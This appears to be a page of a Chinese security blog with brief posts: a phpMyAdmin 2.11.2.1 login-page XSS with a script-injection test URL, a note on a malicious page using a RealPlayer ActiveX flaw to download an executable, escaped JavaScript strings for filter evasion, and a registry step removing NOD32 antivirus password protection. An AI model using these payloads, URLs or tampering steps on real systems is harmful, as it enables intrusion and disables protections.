Nov 27

phpMyAdmin 2.11.2.1 登陆页面跨站

Posted in 网络安全, Author: 老周 Add Comments
  1. $ grep -n convcharset libraries/auth/cookie.auth.lib.php
  2. 48: * @uses    $GLOBALS['convcharset']
  3. 236:
  4. <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />

一切输入都是有害的。
Test:

  1. http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>
Nov 26

pps.htm利用10月Real Player漏洞挂马

Posted in jun0717专栏, Author: jun0717 2 Comments

htp://aa.llsging.com/aa/pps.htm
利用10月公布的realplayer的ActiveX插件的Import方法的漏洞,调用Real Player下载:htp://down.llsging.com/bb/rl.exe

脱壳后文件见附件:

rlunjun0717.txt

Nov 26

python 里的hexdump

Posted in 编程开发, Author: 老周 Add Comments

强悍程度略见一斑啊

  1. FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
  2.  
  3. def dump(src, length=8):
  4.     N=0; result=''
  5.     while src:
  6.         s,src = src[:length],src[length:]
  7.         hexa = ' '.join(["%02X"%ord(x) for x in s])
  8.         s = s.translate(FILTER)
  9.         result += "%04X   %-*s   %s\n" % (N, length*3, hexa, s)
  10.         N+=length
  11.     return result
  12.  
  13. def dump2(src, length=8):
  14.     result=[]
  15.     for i in xrange(0, len(src), length):
  16.         s = src[i:i+length]
  17.         hexa = ' '.join(["%02X"%ord(x) for x in s])
  18.         printable = s.translate(FILTER)
  19.         result.append("%04X   %-*s   %s\n" % (i, length*3, hexa, printable))
  20.     return ''.join(result)
Nov 25

贡米--江西省万年县裴梅镇荷桥村

Posted in jun0717专栏, Author: jun0717 Add Comments

  江西省万年县境内发现了世界上年代最早的水稻植硅石,从而被考古界公认为世界稻作文化起源地。

  万年贡米原产于该县的裴梅镇荷桥村山区,春季播种,到初冬才能收获,亩产仅有200公斤左右,因被朱元璋钦定为“代代耕种,岁岁纳贡”而得名。这种米颗粒大,体细长,颗形如梭,米色似玉。经测定,其蛋白质含量比普通大米高1~2倍,且含丰富的维生素B族和一定数量的微量元素。有意思的是,仅荷桥村300余亩山区水田出产的才最为正宗,移植到其他地方其品质则明显下降。

  据专家考证,这是万年贡米生长要求水土含有多种矿物质、山高垅深日照奇特、泉流地温变异等 特殊的自然环境使然,而荷桥村则恰好符合这些条件。因此荷桥村作为万年贡米原产地,2005年被国家公布为原产地域。去年,万年贡米又成为受省级保护的地 理标志产品。

Nov 25

document.write——–alert

Posted in jun0717专栏, Author: jun0717 3 Comments

权当记事本一用。


◎document.write
\144\157\143\165\155\145\156\164\56\167\162\151\164\145

◎alert
\141\154\145\162\164
或:
\x61\x6c\x65\x72\x74

Nov 24

加密与解密工具下载地址

Posted in jun0717专栏, Author: jun0717 Add Comments

http://www.pediy.com/tools/unpacker.htm

Nov 24

清除NOD32的密码保护

Posted in jun0717专栏, Author: jun0717 Add Comments

清除NOD32的密码保护

将 HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\Info 下的
PackageID 一项删除,可以清除保护密码。

Nov 24

1359034-NAI

Posted in jun0717专栏, Author: jun0717 Add Comments

1359034-NAI

https://secure.nai.com/apps/downloads/my_products/login.asp

Page 5 of 7« First...«34567»